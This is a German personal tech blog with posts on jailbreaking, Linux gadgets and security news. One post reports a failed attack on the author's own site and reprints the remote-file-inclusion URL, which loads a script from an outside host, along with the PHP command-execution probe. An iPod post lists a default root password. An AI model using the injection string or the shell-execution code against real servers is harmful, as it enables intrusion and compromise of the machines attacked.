Montag, Mai 16 2011

Ich mach mal eben nen Jailbreak...

... oder: die komplizierte Geschichte eines Updates. Viele Otto-Normalnutzer sind mit ihrem iPhone und dessen Betriebssystem iOS vollkommen zufrieden und wissen gar nicht was ein Jailbreak überhaupt ist, geschweige denn wie man das iPhone überhaupt updatet. Manchmal sind diese Leute tatsächlich zu beneiden, denn sie ersparen sich unter Umständen viel Ärger. Wer sein iOS Device mit einer neuen Firmware versorgen will, macht natürlich zuerst einmal ein Backup seines Geräts; und das dauert... und dauert... und dauert... und.... wo ist iTunes?! Abgestürzt! Verdammt! Das Ganze noch einmal... Und endlich klappts! Puh, ein großer Schritt ist geschafft. Nun die zuvor geladene Firmware Datei mit dem Shift-Trick wiederherstellen: Klick, ... überprüfe Firmware Update mit Apple... und klack Fehler 3195 - Toll! Hin und her, Tiny Umbrella, neustart und irgendwie klappts dann. Ist die neue Firmware endlich drauf, kanns losgehen mit dem Jailbreak! Juhu! RedSn0w ist das Mittel zum Zweck, Firmware File laden... huch, abgestürtzt... nochmal das Ganze. Nun klappts endlich! Jetzt noch den DFU Mode hinfummeln, zum Glück ist das jetzt im Programm interaktiv für Idioten erklärt, also kein Problem! AHA! "Waiting for iPhone to reboot..." Da warte ich mit... irgendwie scheint es nicht zu wollen. Hmmmmm... Also iPhone reset, nochmal die ganze Prozedur. Und wer hätte es gedacht, diesmal klappts! Jailbreak gemacht! Kein Problem oder? :)

Freitag, April 17 2009

FAIL! - Amazon Suche

Wer kennt das nicht? Man(n) ist ein technikbegeisterter Mensch und möchte sich gerne über das Vernetzen vom Computern informieren, was liegt da näher als sich bei Amazon ein Buch darüber zu bestellen? Gibt man allerdings den Suchbegriff "PC vernetzen" bei Amazon in die Suchmaske, erscheint da folgendes:

amawhatNicht ganz das was man hinter dem Suchbegriff erwartet hat, oder? Die Frage ist nun, Hack, Easteregg oder einfach ein Bug in der Suche? Auf jeden Fall äusserst amüsant!

Freitag, April 10 2009

Wenn man vom Teufel spricht...

hackVor kurzem habe ich noch über die Sicherheit von Passwörtern geschrieben und nun bin ich selbst Opfer eines Angriffs geworden. Dummerweise wurde mein Account bei eine großen Oneklick-Hosters gehackt und dessen Passwort geändert. Nun habe ich keinen Zugriff mehr auf das Konto und kann vermutlich den Account nicht weiter benutzen. Da das genutzte Passwort kein komplexes war, scheint es wohl einer Brute Force oder Wörterbuch Attacke zum Opfer gefallen zu sein, denn sämtliche Seiten sind eigentlich per SSL geschützt. Ich kann dies nur als mahnendes Beispiel ansehen, so komplexe Passworte wie Möglich zu verwenden, ganz besonders bei sensiblen Daten. Better luck next time...damn.

Sonntag, November 30 2008

Linux auf dem iPhone

Laut eines Berichts von Golem läuft Linux nun auch als Betriebssystem auf dem iPhone bzw. iPod Touch. Die Entwickler haben es geschafft, einen 2.6er Kernel auf dem iPhone zu booten. Allerdings muss dafür (noch) eine USB Verbindung zum PC bestehen. Für experimentierfreudige wird eine die Software inklusive Anleitung zum Download angeboten um sein iPhone mit Linux zu bespielen. Aber an dieser Stelle muss ich mich (auch als alter Linuxfreund) fragen: Was soll das? In meinen Augen hat Apple mit der Software ganze Arbeit geleistet und ein wirklich einfaches und innovatives Bedienkonzept entwickelt. Mit dem Jailbreak lassen sich auch kleinere Unix Programme auf dem iPhone nutzen. In meinen Augen nicht mehr als eine nette Tech-Demo. Vielleicht wird es eine Alternative wenn dann irgendwann Openmoko oder Android oder Ubuntu Mobile auf dem Iphone laufen. [GOLEM ARTIKEL]

Dienstag, Oktober 21 2008

Premiere schaltet Verschlüsselung um!

Am gestrigen Montag hat Premiere bei seinem Pay TV Programm Premiere Star die Verschlüsselung geändert. Damit wird es für viele Schwarzseher erstmal dunkel. Um Problemen mit der Umstellung vorzubeugen und einen reibungslosen Ablauf zu garantieren testet Premiere die Umstellung erst im kleineren Kundenkreis, den Premiere Star Abonnenten. Aber auch das restliche TV Angebot von Premiere wird ab dem 30.10 nur noch in NDS Videoguard und einer verbesserten Nagra 2 Version ausgestrahlt. Premiere erhofft sich hierdurch viele neue Kunden unter den Schwarzsehern zu finden. Besonders aber soll dem großen Verlust durch Schwarzseherei entgegengewirkt werden. Die bisher angeblich ungeknackte NDS Videoguard Verschlüsselung ersetzt hierbei alle bisher eingesetzten unsicheren Verschlüsselungsverfahren wie Betacrypt oder Nagravision. Es bleibt abzuwarten, wie lange diese Verschlüsselung ungeknackt bleibt, denn angeblich soll die Firma NDS Hacker bezahlt haben um die Nagra-Verschlüsselung der Kudelski Gruppe zu hacken und sich damit in den Vordergrund zu rücken, was anscheinend auch gelungen ist. Fakt ist, das NDS in den USA wegen dieses Deliktes verklagt worden ist.

Samstag, Oktober 11 2008

CAPTCHA

Viele Websites benutzen sogenannte CAPTCHAS (Completely Automated Public Turing test to tell Computers and Humans Apart) um ihre Dienste vor Missbrauch durch Computer bzw. Computerprogramme zu schützen. Captchas sollten in der Regel für einen Menschen schnell lösbar, für einen Computer hingegen nicht lösbar sein. Verschiedene Ansätze lösen diese Anforderungen mehr oder weniger gut. Es reicht nicht aus, ein paar Buchstaben durchgestrichen darzustellen, denn mittlerweile gibt es so ausgefeilte Algorithmen, die die meisten Text Captchas recht schnell lösen. Viele Betreiber von Websites schwenken deswegen auf die Erkennung von Mustern um. Zum Beispiel soll auf einem Foto ein bestimmtes Tier erkannt werden. Dies ist für einen Computer eine ziemlich unlösbare Aufgabe und daher auch sehr effizient. Die klügste und beste Methode diese Captchas zu knacken ist den User sie lösen zu lassen. Auf einigen Websites werden kleine "Spiele" angeboten, die dem User unbemerkt Captchas unterjubeln, die er dann löst. Dies ist um einiges Kostengünstiger und schneller als Computer mit dieser Aufgabe zu betreuen, denn die Erkennungsrate liegt hier deutlich höher als bei einem Computer. Wer mehr über das Knacken von Captchas erfahren möchte sollte unbedingt hier vorbeischauen. Auf dieser Seite gibts viele Beispiele für gute und schlechte Captchas und auch den Captcha Dekoder Pwntcha zum Download, für die Leute, die es selbst mal versuchen wollen mit dem Knacken. Auch sehr interessant ist der Wikipedia Artikel zu Captchas. Also, frohes tippen...

Mittwoch, Oktober 8 2008

Flugzeugentführung leicht gemacht

Wie viele ja sicher wissen bieten viele Airlines ihren Passagieren einen Internetzugang an Board ihrer Flugzeuge. Wer mit einer Boeing 787 fliegt, sollte sich das Einsteigen allerdings nochmal durch den Kopf gehen lassen. Wie bekannt wurde ist der Internetzugang im Flugzeug an das Navigations und Kommunikationssystem direkt angeschlossen. Durch eine Sicherheitslücke in diesem System ist es dadurch möglich Navigation und Kommunikation zu hacken und Kontrolle darüber zu übernehmen. Auch wenn dies nur schwer möglich ist und sicherheitskritische Systeme davon ausgeschlossen sind sollte man trotzdem auf der Hut sein. Nach offiziellen Angaben besteht allerdings keine Gefahr.

Samstag, September 27 2008

Hackangriff vereitelt

Heute hat anscheinend jm versucht mit nachfolgendem Script meine Seite zu hacken, bzw. illegal PHP Code auszuführen. Das hat glücklicherweise nicht funktioniert. Laut Log kam der Angriff aus Canada: 66.244.233.121 bzw. h66-244-233-121.bigpipeinc.com Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1). Da das ganze von einem Windows System mit dem IE6 durchgeführt wurde, geh ich mal von "Scriptkiddies" aus. Das Script stammt von http://www.trosken.com/test.txt und wurde versucht so auszuführen:
http://maltekueppers.de/wp/index.php?DOCUMENT_ROOT=http://www.trosken.com/test.txt?
Nachfolgend noch der Code des Scripts. Ich hab mich noch nicht durch das Codegwusel durchgearbeitet, werd mich aber mal genauer damit beschäftigen. Wenn jm. auf Anhieb sieht was das tun soll, der darf sich gern melden ;) PHP ist nicht meine Stärke.
<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Sonntag, September 14 2008

Wii Balance Board Hack

Ersurf die Welt mit dem Wii Balace Board! Ob Google Earth, Virtual Earth oder was auch immer. Einfach anschauen und Spass haben ;)

Samstag, September 13 2008

Wiimote Maus in Ubuntu

Um die Wiimote, also die Fernbedienung der Wii als Mausalternative zu nutzen benötigen wir das Paket wminput aus den Universe Quellen. Wer möchte kann noch das Paket wmgui mitinstallieren. Es bietet wie der Name vermuten lässt, eine Gui zu wminput an, wird aber nicht benötigt. Nach der Installation muss der Wiimote-Treiber mittels
sudo modprobe uinput
geladen werden. Ist dies fehlerfrei geschehen, kann man mit:
wminput -w
das Programm starten. Einfach die Tasten 1+2 auf der Wiimote drücken und die sollte erkannt werden. Nun lässt dich durch drehen und neigen der Wiimote der Mauszeiger steuern. Allerdings ist das nicht sehr komfortabel. Um den Cursor so zu steuern, wie man es von der Wii her kennt, sollte man die IR-Leiste benutzen, oder zumindest eine simulieren. Am besten plaziert man zwei Lampen auf dem Bildschirm. Ihre Entfernung zueinander sollte ungefähr so breit sein, wie die Wii Sensorleiste. Da die Sensoren in der Wiimote nur auf Lichtquellen ansprechen, die auch wirklich Infrarotlicht aussenden, eigenen sich zum Beispiel LEDs nicht, wie ich selbst festgestellt habe. Eine normale Fernbedinung funktioniert zum Beispiel. Auch Teelichte oder ähnliches tun je nach Monitor gute Dienste. Am besten kann man sehen wie gut oder wie schlecht die Lichtquelle ist, wenn man wmgui startet und sich die IR Sicht der Wiimote anschaut.  Der Trick mit den Kerzen bzw. den Lichtquellen auf dem Fernseher funktioniert überigens auch mit der Wii. Nun muss wminput nur noch mitgeteilt werden, das eine "Sensorleiste" benutzt wird und das tun wir mit dem Befehl:
sudo wminput -c ir_ptr -w

Donnerstag, September 11 2008

Ipod Touch on Ubuntu

Kopie eines Artikels, den ich früher mal geschrieben habe. Da es mittlerweile andere Firmwareversionen gibt, trifft manches vielleicht nicht mehr zu! In der angegebenen Firmwareversion 1.3 funktioniert allerdings alles einwandfrei! UPDATE 17.09.08: Wie ich gelesen habe funktioniert das syncen ab Firmware Version sowieso nicht mehr unter Ubuntu, daher sollte der Artikel auch seine Gültigkeit behalten ;) Because I had various problems getting my iPod Touch to work correctly with my Ubuntu PC, I decided to share all information I gathered with you folks. Here we go: What do I need to get my iPod Touch working with Linux? At first you will have to jailbreak you iPod. Use google for more information on that, there are tons of good howtos on the net, for example: http://rupertgee.wordpress.com/2008/02/08/jailbreak-113-official-gui-2/
1. Issues with Firmware 1.1.3 Until you do the following you wont be able to sync you iPod with a Linux PC if you are using firmware 1.1.3. Because some directories have changed and so on... To be able to sync 1.1.3 iPod with Amarok for example follow these steps. At first
Copy a song to the iPod using iTunes with Mac or PC
Now open an FTP-connection to your iPod by typing in Dolphin i.e. or any other program of your choice:
 sftp://<YourDeviceIP>
If you have configured passwordless access you should be logged in, if not enter "root" as username and "alpine" as your password. Locate
     /var/mobile/Media/com.apple.itunes.lock_sync
and copy the file to
    /var/root/Media
Now DELETE the complete folder
    var/mobile/Media
on the iPod. If you are done close the FTP connection. Connect to your iPod via SSH in the Terminal by typing:
ssh root@<YourDeviceIP>
Create a symbolic link on the iPod by entering
ln -s /var/root/Media /var/mobile/Media
Now disconnect, reboot your iPod and you should be able to sync again. 2. Passwordless Access to your Ipod At first create a new RSA key pair by typing
ssh-keygen -t rsa
Leave the path untouched and DO NOT entern a password. Simply press ENTER. After that a private and a public RSA Key will be found in ~/.ssh Now copy the public key to your ipod device by using the following command:
ssh-copy-id -i ~/.ssh/id_rsa.pub root@<device ip>
Log into the iPod from a terminal by typing
ssh root@<device ip>
You will be still asked for a password. Thats ok! Now we have to edit the sshd_config file on the ipod using the pico editor. But before we do this first set the right permissions to the ssh folder. Otherwise the ssh-deamon will refuse to read the keyfile. Set the following:
chmod 0755 ~ ~/.ssh
chmod 0644 ~/.ssh/*
Now we must change the authentication settings by editing the sshd_config. Open it with
pico /etc/sshd_config
Note: This file is NOT empty! Scroll down until you find #RSAAuthentication. Change the 3 lines to:
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile	%h/.ssh/authorized_keys
Save the file pressing CTRL+O and then exit the editor using CTRL+X. Then type
reboot
and we are done! When the ipod is up again try to login via ssh like above. This should work without entering a password now.